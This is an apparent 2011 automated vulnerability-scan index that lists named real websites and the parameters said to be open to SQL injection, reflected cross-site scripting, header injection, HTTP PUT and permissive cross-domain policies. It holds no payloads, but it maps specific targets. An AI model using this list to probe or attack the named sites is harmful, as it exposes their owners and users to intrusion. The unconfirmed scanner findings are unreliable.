XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05032011-04

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Tue May 03 20:33:44 CDT 2011.


Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

1. SQL injection

1.1. http://ad.doubleclick.net/adi/N763.no_url_specifiedOX2462/B4639841.8 [name of an arbitrarily supplied request parameter]

1.2. http://ad.doubleclick.net/adi/N763.no_url_specifiedOX2462/B4639841.8 [sz parameter]

1.3. http://as.casalemedia.com/j [p parameter]

1.4. http://tag.contextweb.com/TagPublish/getad.aspx [tl parameter]

1.5. http://tag.contextweb.com/TagPublish/getjs.aspx [REST URL parameter 1]

1.6. http://www.aiche.org/favicon.ico [REST URL parameter 1]

1.7. http://www.aiche.org/favicon.ico [name of an arbitrarily supplied request parameter]

1.8. http://www.amateurfarm.net/favicon.ico [REST URL parameter 1]

1.9. http://www.amateurfarm.net/favicon.ico [name of an arbitrarily supplied request parameter]

1.10. http://www.divorcemag.com/favicon.ico [REST URL parameter 1]

1.11. http://www.divorcemag.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.12. http://www.edison.com/favicon.ico [REST URL parameter 1]

1.13. http://www.expertsatellite.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.14. http://www.infiniti.com/favicon.ico [REST URL parameter 1]

1.15. http://www.infiniti.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.16. http://www.lvhn.org/favicon.ico [REST URL parameter 1]

1.17. http://www.mailfromftd.com/favicon.ico [REST URL parameter 1]

1.18. http://www.nativeoutdoors.com/favicon.ico [REST URL parameter 1]

1.19. http://www.nativeoutdoors.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.20. http://www.needlepointers.com/favicon.ico [REST URL parameter 1]

1.21. http://www.osbornewood.com/favicon.ico [REST URL parameter 1]

1.22. http://www.payentry.com/favicon.ico [REST URL parameter 1]

1.23. http://www.state.de.us/favicon.ico [User-Agent HTTP header]

1.24. http://www.straight.com/favicon.ico [REST URL parameter 1]

1.25. http://www.thechildrenswearoutlet.com/favicon.ico [name of an arbitrarily supplied request parameter]

2. ASP.NET tracing enabled

2.1. http://www.allentate.com/trace.axd

2.2. http://www.endlessvacation.com/trace.axd

2.3. http://www.identitychecks.com/trace.axd

2.4. http://www.woodworking.com/trace.axd

3. XPath injection

4. HTTP PUT enabled

4.1. http://www.findire.com/favicon.ico

4.2. http://www.thenursingscholars.com/favicon.ico

5. HTTP header injection

5.1. http://ad.doubleclick.net/ad/tnews.lee.net/ [REST URL parameter 1]

5.2. http://ad.doubleclick.net/adi/N763.no_url_specifiedOX2462/B4639841.8 [REST URL parameter 1]

5.3. http://ad.doubleclick.net/adj/cm.rev_lee/ [REST URL parameter 1]

5.4. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]

5.5. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [$ parameter]

5.6. http://www.askdramy.com/favicon.ico [REST URL parameter 1]

5.7. http://www.grubhub.com/favicon.ico [REST URL parameter 1]

5.8. http://www.haircuttery.com/favicon.ico [REST URL parameter 1]

5.9. http://www.homebasedofficework.com/favicon.ico [REST URL parameter 1]

5.10. http://www.imaxenes.com/favicon.ico [REST URL parameter 1]

6. Cross-site scripting (reflected)

6.1. http://a.collective-media.net/adj/cm.rev_lee/ [REST URL parameter 2]

6.2. http://a.collective-media.net/adj/cm.rev_lee/ [name of an arbitrarily supplied request parameter]

6.3. http://a.collective-media.net/adj/cm.rev_lee/ [sz parameter]

6.4. http://ad.turn.com/server/pixel.htm [fpid parameter]

6.5. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]

6.6. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

6.7. http://ar.voicefive.com/b/rc.pli [func parameter]

6.8. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]

6.9. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]

6.10. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]

6.11. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]

6.12. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter]

6.13. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter]

6.14. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter]

6.15. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter]

6.16. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [$ parameter]

6.17. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [$ parameter]

6.18. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [q parameter]

6.19. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [q parameter]

6.20. http://ib.adnxs.com/ptj [redir parameter]

6.21. http://k.collective-media.net/cmadj/cm.rev_lee/ [REST URL parameter 2]

6.22. http://k.collective-media.net/cmadj/cm.rev_lee/ [sz parameter]

6.23. http://servedby.flashtalking.com/imp/3/15881 [124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click parameter]

6.24. http://servedby.flashtalking.com/imp/3/15881 [cachebuster parameter]

6.25. http://servedby.flashtalking.com/imp/3/15881 [ftadz parameter]

6.26. http://servedby.flashtalking.com/imp/3/15881 [ftscw parameter]

6.27. http://servedby.flashtalking.com/imp/3/15881 [ftx parameter]

6.28. http://servedby.flashtalking.com/imp/3/15881 [fty parameter]

6.29. http://servedby.flashtalking.com/imp/3/15881 [name of an arbitrarily supplied request parameter]

6.30. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

6.31. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

6.32. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

6.33. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

6.34. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

6.35. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

6.36. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

6.37. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

6.38. http://www.610wtvn.com/favicon.ico [REST URL parameter 1]

6.39. http://www.610wtvn.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.40. http://www.alvinisd.net/favicon.ico [REST URL parameter 1]

6.41. http://www.am570radio.com/favicon.ico [REST URL parameter 1]

6.42. http://www.am570radio.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.43. http://www.aquascapeonline.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.44. http://www.ashop.com.au/favicon.ico [name of an arbitrarily supplied request parameter]

6.45. http://www.bigtitcreampie.com/favicon.ico [REST URL parameter 1]

6.46. http://www.bigtitcreampie.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.47. http://www.bvonstyle.com/favicon.ico [REST URL parameter 1]

6.48. http://www.cashstore.com/favicon.ico [REST URL parameter 1]

6.49. http://www.cerritos.edu/favicon.ico [REST URL parameter 1]

6.50. http://www.churchleaderinsights.com/favicon.ico [REST URL parameter 1]

6.51. http://www.click-now.net/favicon.ico [name of an arbitrarily supplied request parameter]

6.52. http://www.coinmerc.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.53. http://www.diethealthclub.com/favicon.ico [REST URL parameter 1]

6.54. http://www.fluke.com/favicon.ico [REST URL parameter 1]

6.55. http://www.fluke.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.56. http://www.forconstructionpros.com/favicon.ico [REST URL parameter 1]

6.57. http://www.greatnow.com/favicon.ico [REST URL parameter 1]

6.58. http://www.greatnow.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.59. http://www.healthcarejobsite.com/favicon.ico [REST URL parameter 1]

6.60. http://www.healthiertalk.com/favicon.ico [REST URL parameter 1]

6.61. http://www.hollywoodpix.net/favicon.ico [REST URL parameter 1]

6.62. http://www.hollywoodpix.net/favicon.ico [REST URL parameter 1]

6.63. http://www.homegauge.com/favicon.ico [REST URL parameter 1]

6.64. http://www.hymnary.org/favicon.ico [REST URL parameter 1]

6.65. http://www.logicbuy.com/favicon.ico [REST URL parameter 1]

6.66. http://www.makefive.com/favicon.ico [REST URL parameter 1]

6.67. http://www.maysville-online.com/app/scripts/ajaxModules/'+upickemDeals[0][2]+' [REST URL parameter 1]

6.68. http://www.maysville-online.com/app/scripts/ajaxModules/'+upickemDeals[0][2]+' [REST URL parameter 1]

6.69. http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php [bg parameter]

6.70. http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php [countColor parameter]

6.71. http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php [headerBg parameter]

6.72. http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php [headerColor parameter]

6.73. http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php [upickemSignup parameter]

6.74. http://www.maysville-online.com/app/weather/qwikcast_feed0.xml [REST URL parameter 1]

6.75. http://www.maysville-online.com/app/weather/qwikcast_feed0.xml [REST URL parameter 1]

6.76. http://www.maysville-online.com/content/ [REST URL parameter 1]

6.77. http://www.maysville-online.com/content/ [REST URL parameter 1]

6.78. http://www.maysville-online.com/content/ [name of an arbitrarily supplied request parameter]

6.79. http://www.maysville-online.com/favicon.ico [REST URL parameter 1]

6.80. http://www.maysville-online.com/favicon.ico [REST URL parameter 1]

6.81. http://www.maysville-online.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.82. http://www.naturalhealers.com/favicon.ico [REST URL parameter 1]

6.83. http://www.naturalhealers.com/favicon.ico [REST URL parameter 1]

6.84. http://www.ntra.com/favicon.ico [REST URL parameter 1]

6.85. http://www.ontargetpayday.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.86. http://www.osbornewood.com/favicon.ico [REST URL parameter 1]

6.87. http://www.outsideinfo.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.88. http://www.pordeo.com/favicon.ico [REST URL parameter 1]

6.89. http://www.prosolutionpills.com/favicon.ico [REST URL parameter 1]

6.90. http://www.prosolutionpills.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.91. http://www.pusd.org/favicon.ico [REST URL parameter 1]

6.92. http://www.reflector.com/favicon.ico [REST URL parameter 1]

6.93. http://www.schneider.com/favicon.ico [REST URL parameter 1]

6.94. http://www.sport-tube.com/favicon.ico [REST URL parameter 1]

6.95. http://www.state-insurance-online.com/favicon.ico [REST URL parameter 1]

6.96. http://www.state-insurance-online.com/favicon.ico [REST URL parameter 1]

6.97. http://www.straight.com/favicon.ico [REST URL parameter 1]

6.98. http://www.thedailycat.com/favicon.ico [REST URL parameter 1]

6.99. http://www.thomann.de/favicon.ico [REST URL parameter 1]

6.100. http://www.tradearca.com/favicon.ico [REST URL parameter 1]

6.101. http://www.tradearca.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.102. http://www.travelagentcentral.com/favicon.ico [REST URL parameter 1]

6.103. http://www.travelagentcentral.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.104. http://www.upmystreet.com/favicon.ico [REST URL parameter 1]

6.105. http://www.vermontjoblink.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.106. http://www.vivareal.us/favicon.ico [REST URL parameter 1]

6.107. http://www.wdasfm.com/favicon.ico [REST URL parameter 1]

6.108. http://www.wdasfm.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.109. http://www.web-stat.net/favicon.ico [REST URL parameter 1]

6.110. http://www.webdesign.org/favicon.ico [REST URL parameter 1]

6.111. http://www.webdesign.org/favicon.ico [REST URL parameter 1]

6.112. http://www.wireless-driver.com/favicon.ico [REST URL parameter 1]

6.113. http://www.xcomment.com/favicon.ico [REST URL parameter 1]

6.114. http://www.xcomment.com/favicon.ico [REST URL parameter 1]

6.115. http://www.xcomment.com/favicon.ico [REST URL parameter 1]

6.116. http://www.xcomment.com/favicon.ico [REST URL parameter 1]

6.117. http://www.boomboomflicks.com/favicon.ico [Referer HTTP header]

6.118. http://www.freshpreservingstore.com/favicon.ico [User-Agent HTTP header]

6.119. http://www.prosolutionpills.com/favicon.ico [Referer HTTP header]

6.120. http://www.tradearca.com/favicon.ico [Referer HTTP header]

6.121. http://www.youngtubeclub.com/favicon.ico [Referer HTTP header]

6.122. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [FFpb cookie]

6.123. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [FFpb cookie]

6.124. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [ZEDOIDA cookie]

6.125. http://k.collective-media.net/cmadj/cm.rev_lee/ [cli cookie]

6.126. http://k.collective-media.net/cmadj/cm.rev_lee/ [cli cookie]

6.127. http://www.adaeveningnews.com/favicon.ico [REST URL parameter 1]

6.128. http://www.adaeveningnews.com/favicon.ico [REST URL parameter 1]

6.129. http://www.adaeveningnews.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.130. http://www.adaeveningnews.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.131. http://www.imaxenes.com/favicon.ico [REST URL parameter 1]

6.132. http://www.imaxenes.com/favicon.ico [REST URL parameter 1]

6.133. http://www.nextbigfuture.com/favicon.ico [REST URL parameter 1]

6.134. http://www.nextbigfuture.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.135. http://www.russianeuro.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.136. http://www.russianeuro.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.137. http://www.timeswv.com/favicon.ico [REST URL parameter 1]

6.138. http://www.timeswv.com/favicon.ico [REST URL parameter 1]

6.139. http://www.timeswv.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.140. http://www.timeswv.com/favicon.ico [name of an arbitrarily supplied request parameter]

7. Flash cross-domain policy

7.1. http://a.collective-media.net/crossdomain.xml

7.2. http://a.tribalfusion.com/crossdomain.xml

7.3. http://ad.doubleclick.net/crossdomain.xml

7.4. http://ad.turn.com/crossdomain.xml

7.5. http://ads.pointroll.com/crossdomain.xml

7.6. http://ads.specificmedia.com/crossdomain.xml

7.7. http://adserv.impactengine.com/crossdomain.xml

7.8. http://afe.specificclick.net/crossdomain.xml

7.9. http://aperture.displaymarketplace.com/crossdomain.xml

7.10. http://ar.voicefive.com/crossdomain.xml

7.11. http://as.casalemedia.com/crossdomain.xml

7.12. http://b.scorecardresearch.com/crossdomain.xml

7.13. http://b.voicefive.com/crossdomain.xml

7.14. http://bh.contextweb.com/crossdomain.xml

7.15. http://c.betrad.com/crossdomain.xml

7.16. http://c.yardbarker.com/crossdomain.xml

7.17. http://cache.specificmedia.com/crossdomain.xml

7.18. http://cdn.turn.com/crossdomain.xml

7.19. http://cms.quantserve.com/crossdomain.xml

7.20. http://d.xp1.ru4.com/crossdomain.xml

7.21. http://d13.zedo.com/crossdomain.xml

7.22. http://d3.zedo.com/crossdomain.xml

7.23. http://d7.zedo.com/crossdomain.xml

7.24. http://i.w55c.net/crossdomain.xml

7.25. http://ib.adnxs.com/crossdomain.xml

7.26. http://idpix.media6degrees.com/crossdomain.xml

7.27. http://img0.yardbarker.com/crossdomain.xml

7.28. http://img1.yardbarker.com/crossdomain.xml

7.29. http://img2.yardbarker.com/crossdomain.xml

7.30. http://img3.yardbarker.com/crossdomain.xml

7.31. http://k.collective-media.net/crossdomain.xml

7.32. http://l.betrad.com/crossdomain.xml

7.33. http://leeenterprises.112.2o7.net/crossdomain.xml

7.34. http://m1.zedo.com/crossdomain.xml

7.35. http://pixel.quantserve.com/crossdomain.xml

7.36. http://r.turn.com/crossdomain.xml

7.37. http://r1-ads.ace.advertising.com/crossdomain.xml

7.38. http://rs.gwallet.com/crossdomain.xml

7.39. http://servedby.flashtalking.com/crossdomain.xml

7.40. http://spe.atdmt.com/crossdomain.xml

7.41. http://speed.pointroll.com/crossdomain.xml

7.42. http://stat.flashtalking.com/crossdomain.xml

7.43. http://tags.bluekai.com/crossdomain.xml

7.44. http://turn.nexac.com/crossdomain.xml

7.45. http://www.610wtvn.com/crossdomain.xml

7.46. http://www.971zht.com/crossdomain.xml

7.47. http://www.977music.com/crossdomain.xml

7.48. http://www.air1.com/crossdomain.xml

7.49. http://www.am570radio.com/crossdomain.xml

7.50. http://www.artvoice.com/crossdomain.xml

7.51. http://www.axill.com/crossdomain.xml

7.52. http://www.big1059.com/crossdomain.xml

7.53. http://www.bikersingle.com/crossdomain.xml

7.54. http://www.boydgaming.com/crossdomain.xml

7.55. http://www.branditz.com/crossdomain.xml

7.56. http://www.broadbandsports.com/crossdomain.xml

7.57. http://www.builderonline.com/crossdomain.xml

7.58. http://www.buildlastingsuccess.com/crossdomain.xml

7.59. http://www.cariboucoffee.com/crossdomain.xml

7.60. http://www.carpictures.com/crossdomain.xml

7.61. http://www.cayenne.com/crossdomain.xml

7.62. http://www.centralmarket.com/crossdomain.xml

7.63. http://www.chamberorganizer.com/crossdomain.xml

7.64. http://www.chnlove.com/crossdomain.xml

7.65. http://www.coldplay.com/crossdomain.xml

7.66. http://www.collegeotr.com/crossdomain.xml

7.67. http://www.colony1.net/crossdomain.xml

7.68. http://www.contextads.net/crossdomain.xml

7.69. http://www.createfreepolls.com/crossdomain.xml

7.70. http://www.d2jsp.org/crossdomain.xml

7.71. http://www.daddario.com/crossdomain.xml

7.72. http://www.diesel.com/crossdomain.xml

7.73. http://www.dishant.com/crossdomain.xml

7.74. http://www.donbest.com/crossdomain.xml

7.75. http://www.dontstayin.com/crossdomain.xml

7.76. http://www.doublegames.com/crossdomain.xml

7.77. http://www.downy.com/crossdomain.xml

7.78. http://www.eventsinyuma.com/crossdomain.xml

7.79. http://www.exploregeorgia.org/crossdomain.xml

7.80. http://www.eyny.com/crossdomain.xml

7.81. http://www.findire.com/crossdomain.xml

7.82. http://www.firstresponse.com/crossdomain.xml

7.83. http://www.floorplanner.com/crossdomain.xml

7.84. http://www.forconstructionpros.com/crossdomain.xml

7.85. http://www.formrouter.net/crossdomain.xml

7.86. http://www.geckobyte.com/crossdomain.xml

7.87. http://www.goodbait.com/crossdomain.xml

7.88. http://www.h2onews.org/crossdomain.xml

7.89. http://www.helloatlanta.com/crossdomain.xml

7.90. http://www.house365.com/crossdomain.xml

7.91. http://www.hrs.com/crossdomain.xml

7.92. http://www.ihousenet.com/crossdomain.xml

7.93. http://www.imagetwist.com/crossdomain.xml

7.94. http://www.jackdaniels.com/crossdomain.xml

7.95. http://www.jumeirah.com/crossdomain.xml

7.96. http://www.justgiving.com/crossdomain.xml

7.97. http://www.kewego.fr/crossdomain.xml

7.98. http://www.kibagames.com/crossdomain.xml

7.99. http://www.kswo.com/crossdomain.xml

7.100. http://www.ktiv.com/crossdomain.xml

7.101. http://www.kwqc.com/crossdomain.xml

7.102. http://www.kzzp.com/crossdomain.xml

7.103. http://www.landsharklager.com/crossdomain.xml

7.104. http://www.littlebigplanet.com/crossdomain.xml

7.105. http://www.lotto.pl/crossdomain.xml

7.106. http://www.mapmyfitness.com/crossdomain.xml

7.107. http://www.maxadds.com/crossdomain.xml

7.108. http://www.maxdome.de/crossdomain.xml

7.109. http://www.mbrgames.com/crossdomain.xml

7.110. http://www.mercadolivre.com.br/crossdomain.xml

7.111. http://www.motorracingnetwork.com/crossdomain.xml

7.112. http://www.msgcu.org/crossdomain.xml

7.113. http://www.mydivadoll.com/crossdomain.xml

7.114. http://www.netminers.dk/crossdomain.xml

7.115. http://www.nowness.com/crossdomain.xml

7.116. http://www.osobnosti.cz/crossdomain.xml

7.117. http://www.outsidethebeltway.com/crossdomain.xml

7.118. http://www.paintthe88.com/crossdomain.xml

7.119. http://www.pentaximaging.com/crossdomain.xml

7.120. http://www.playingforchange.com/crossdomain.xml

7.121. http://www.playmymovs.com/crossdomain.xml

7.122. http://www.playsportstv.com/crossdomain.xml

7.123. http://www.podfeed.net/crossdomain.xml

7.124. http://www.pordeo.com/crossdomain.xml

7.125. http://www.ppcgeeks.com/crossdomain.xml

7.126. http://www.princesshouse.com/crossdomain.xml

7.127. http://www.royalvegas.eu/crossdomain.xml

7.128. http://www.rp-online.de/crossdomain.xml

7.129. http://www.sekindo.com/crossdomain.xml

7.130. http://www.sfgotobat.com/crossdomain.xml

7.131. http://www.sheezyart.com/crossdomain.xml

7.132. http://www.skullcandy.com/crossdomain.xml

7.133. http://www.smartvideochannel.com/crossdomain.xml

7.134. http://www.songselect.com/crossdomain.xml

7.135. http://www.splashup.com/crossdomain.xml

7.136. http://www.thecampuscommon.com/crossdomain.xml

7.137. http://www.theevonywiki.com/crossdomain.xml

7.138. http://www.themag12.com/crossdomain.xml

7.139. http://www.themat.com/crossdomain.xml

7.140. http://www.thomann.de/crossdomain.xml

7.141. http://www.ticketleap.net/crossdomain.xml

7.142. http://www.towsontigers.com/crossdomain.xml

7.143. http://www.traxnyc.com/crossdomain.xml

7.144. http://www.truthin2010.org/crossdomain.xml

7.145. http://www.tubeguide.info/crossdomain.xml

7.146. http://www.tunecore.com/crossdomain.xml

7.147. http://www.tvb.com/crossdomain.xml

7.148. http://www.twilightersanonymous.com/crossdomain.xml

7.149. http://www.verawang.com/crossdomain.xml

7.150. http://www.vertadnet.com/crossdomain.xml

7.151. http://www.vladtod.com/crossdomain.xml

7.152. http://www.wdasfm.com/crossdomain.xml

7.153. http://www.we7.com/crossdomain.xml

7.154. http://www.wect.com/crossdomain.xml

7.155. http://www.weebls-stuff.com/crossdomain.xml

7.156. http://www.wildfanny.com/crossdomain.xml

7.157. http://www.wowtattoos.com/crossdomain.xml

7.158. http://www.wten.com/crossdomain.xml

7.159. http://www.yardbarker.com/crossdomain.xml

7.160. http://www.yournewenglandforddealer.com/crossdomain.xml

7.161. http://ads.adbrite.com/crossdomain.xml

7.162. http://cookex.amp.yahoo.com/crossdomain.xml

7.163. http://feeds.bbci.co.uk/crossdomain.xml

7.164. http://newsrss.bbc.co.uk/crossdomain.xml

7.165. http://open.ad.yieldmanager.net/crossdomain.xml

7.166. http://www.126.com/crossdomain.xml

7.167. http://www.accu-chek.com/crossdomain.xml

7.168. http://www.actonsoftware.com/crossdomain.xml

7.169. http://www.allbran.com/crossdomain.xml

7.170. http://www.b92.net/crossdomain.xml

7.171. http://www.bimvid.com/crossdomain.xml

7.172. http://www.bookmaker.com/crossdomain.xml

7.173. http://www.bowtecharchery.com/crossdomain.xml

7.174. http://www.burton.com/crossdomain.xml

7.175. http://www.bvonstyle.com/crossdomain.xml

7.176. http://www.carnivalmagic.com/crossdomain.xml

7.177. http://www.citrix.com/crossdomain.xml

7.178. http://www.classicwordgames.com/crossdomain.xml

7.179. http://www.clubpogo.com/crossdomain.xml

7.180. http://www.ctnow.com/crossdomain.xml

7.181. http://www.ebay.pl/crossdomain.xml

7.182. http://www.ellusionist.com/crossdomain.xml

7.183. http://www.eluniversal.com/crossdomain.xml

7.184. http://www.facebook.com/crossdomain.xml

7.185. http://www.gadsdentimes.com/crossdomain.xml

7.186. http://www.giftcards.com/crossdomain.xml

7.187. http://www.hepsiburada.com/crossdomain.xml

7.188. http://www.hgvclub.com/crossdomain.xml

7.189. http://www.homeawayrealestate.com/crossdomain.xml

7.190. http://www.jaguar.com/crossdomain.xml

7.191. http://www.jameshardie.com/crossdomain.xml

7.192. http://www.kerpoof.com/crossdomain.xml

7.193. http://www.kidk.com/crossdomain.xml

7.194. http://www.kjct8.com/crossdomain.xml

7.195. http://www.kxlh.com/crossdomain.xml

7.196. http://www.lacoste.com/crossdomain.xml

7.197. http://www.lasalle.edu/crossdomain.xml

7.198. http://www.launchfire.com/crossdomain.xml

7.199. http://www.lespac.com/crossdomain.xml

7.200. http://www.marca.com/crossdomain.xml

7.201. http://www.mikesbikes.com/crossdomain.xml

7.202. http://www.minglehouse.com/crossdomain.xml

7.203. http://www.monica.com/crossdomain.xml

7.204. http://www.mtv.ca/crossdomain.xml

7.205. http://www.nin.com/crossdomain.xml

7.206. http://www.northerntrust.com/crossdomain.xml

7.207. http://www.nu.nl/crossdomain.xml

7.208. http://www.o.biz/crossdomain.xml

7.209. http://www.oregonlotteryloyalty.org/crossdomain.xml

7.210. http://www.our-hometown.com/crossdomain.xml

7.211. http://www.palacenet.com/crossdomain.xml

7.212. http://www.playtech.com/crossdomain.xml

7.213. http://www.portableairshop.com/crossdomain.xml

7.214. http://www.raylamontagne.com/crossdomain.xml

7.215. http://www.realbird.com/crossdomain.xml

7.216. http://www.reflector.com/crossdomain.xml

7.217. http://www.ryland.com/crossdomain.xml

7.218. http://www.samashmusic.com/crossdomain.xml

7.219. http://www.saukvalley.com/crossdomain.xml

7.220. http://www.schuelervz.net/crossdomain.xml

7.221. http://www.sleepconnect.com/crossdomain.xml

7.222. http://www.socializr.com/crossdomain.xml

7.223. http://www.spankwireinhd.com/crossdomain.xml

7.224. http://www.sub5zero.com/crossdomain.xml

7.225. http://www.superstreetonline.com/crossdomain.xml

7.226. http://www.swvatoday.com/crossdomain.xml

7.227. http://www.targetcenter.com/crossdomain.xml

7.228. http://www.tbd.com/crossdomain.xml

7.229. http://www.the39clues.com/crossdomain.xml

7.230. http://www.thefwa.com/crossdomain.xml

7.231. http://www.trade2win.com/crossdomain.xml

7.232. http://www.tradearca.com/crossdomain.xml

7.233. http://www.ualmileageplus.com/crossdomain.xml

7.234. http://www.uniqlo.com/crossdomain.xml

7.235. http://www.urbanministry.org/crossdomain.xml

7.236. http://www.usa-gymnastics.org/crossdomain.xml

7.237. http://www.usafootball.com/crossdomain.xml

7.238. http://www.usfunds.com/crossdomain.xml

7.239. http://www.webcampromotions.com/crossdomain.xml

7.240. http://www.wofford.edu/crossdomain.xml

7.241. http://www.woodsmith.com/crossdomain.xml

7.242. http://www.xstreetsl.com/crossdomain.xml

7.243. http://www.zapak.com/crossdomain.xml

7.244. http://www.zdnetasia.com/crossdomain.xml

7.245. http://www.zegeridotc.com/crossdomain.xml

7.246. http://www.123-reg.co.uk/crossdomain.xml

7.247. http://www.20minutos.es/crossdomain.xml

7.248. http://www.adddev2.com/crossdomain.xml

7.249. http://www.avaloncommunities.com/crossdomain.xml

7.250. http://www.bhgrealestate.com/crossdomain.xml

7.251. http://www.boomkat.com/crossdomain.xml

7.252. http://www.coahomacc.edu/crossdomain.xml

7.253. http://www.costore.com/crossdomain.xml

7.254. http://www.doctorswithoutborders.org/crossdomain.xml

7.255. http://www.donga.com/crossdomain.xml

7.256. http://www.eaglesband.com/crossdomain.xml

7.257. http://www.emporia.edu/crossdomain.xml

7.258. http://www.figures.com/crossdomain.xml

7.259. http://www.firstweber.com/crossdomain.xml

7.260. http://www.fly2houston.com/crossdomain.xml

7.261. http://www.fvtc.edu/crossdomain.xml

7.262. http://www.hostesscakes.com/crossdomain.xml

7.263. http://www.idahopress.com/crossdomain.xml

7.264. http://www.indianagazette.com/crossdomain.xml

7.265. http://www.jimmyjohns.com/crossdomain.xml

7.266. http://www.justjigsawpuzzles.com/crossdomain.xml

7.267. http://www.kspr.com/crossdomain.xml

7.268. http://www.lattc.edu/crossdomain.xml

7.269. http://www.lightreading.com/crossdomain.xml

7.270. http://www.market4free.com/crossdomain.xml

7.271. http://www.maysville-online.com/crossdomain.xml

7.272. http://www.mrclean.com/crossdomain.xml

7.273. http://www.myepets.com/crossdomain.xml

7.274. http://www.neaq.org/crossdomain.xml

7.275. http://www.neatco.com/crossdomain.xml

7.276. http://www.pecentral.org/crossdomain.xml

7.277. http://www.primos.com/crossdomain.xml

7.278. http://www.rifftrax.com/crossdomain.xml

7.279. http://www.samstowntunica.com/crossdomain.xml

7.280. http://www.scott-sports.com/crossdomain.xml

7.281. http://www.stjohnprovidence.org/crossdomain.xml

7.282. http://www.supermotors.net/crossdomain.xml

7.283. http://www.theknackkids.com/crossdomain.xml

7.284. http://www.virtualrabbit.com/crossdomain.xml

7.285. http://www.wendoverfun.com/crossdomain.xml

8. Silverlight cross-domain policy

8.1. http://ad.doubleclick.net/clientaccesspolicy.xml

8.2. http://ads.pointroll.com/clientaccesspolicy.xml

8.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

8.4. http://b.voicefive.com/clientaccesspolicy.xml

8.5. http://c.yardbarker.com/clientaccesspolicy.xml

8.6. http://leeenterprises.112.2o7.net/clientaccesspolicy.xml

8.7. http://spe.atdmt.com/clientaccesspolicy.xml

8.8. http://speed.pointroll.com/clientaccesspolicy.xml

8.9. http://www.blueangels.navy.mil/clientaccesspolicy.xml

8.10. http://www.chessbase.com/clientaccesspolicy.xml

8.11. http://www.maxdome.de/clientaccesspolicy.xml

8.12. http://www.towsontigers.com/clientaccesspolicy.xml

8.13. http://www.marca.com/clientaccesspolicy.xml

8.14. http://www.montgomerycountytn.org/clientaccesspolicy.xml

9. Cleartext submission of password

9.1. http://www.ascp.org/favicon.ico

9.2. http://www.bikersingle.com/favicon.ico

9.3. http://www.extrabux.com/favicon.ico

9.4. http://www.restaurantrow.com/favicon.ico

9.5. http://www.voa.org/favicon.ico

9.6. http://www.xcomment.com/favicon.ico

9.7. http://www.xcomment.com/favicon.ico

10. Session token in URL

10.1. http://www.facebook.com/extern/login_status.php

10.2. http://www.methodisthealth.org/favicon.ico

10.3. http://www.vc.edu/favicon.ico

11. ASP.NET ViewState without MAC enabled

11.1. http://www.ashop.com.au/favicon.ico

11.2. http://www.findire.com/favicon.ico

12. Cookie scoped to parent domain

12.1. http://www.atomiclearning.com/favicon.ico

12.2. http://www.thelaughtermovie.com/favicon.ico

12.3. http://www.ticketleap.net/favicon.ico

12.4. http://www.tireteam.com/favicon.ico

12.5. http://www.travelagentcentral.com/favicon.ico

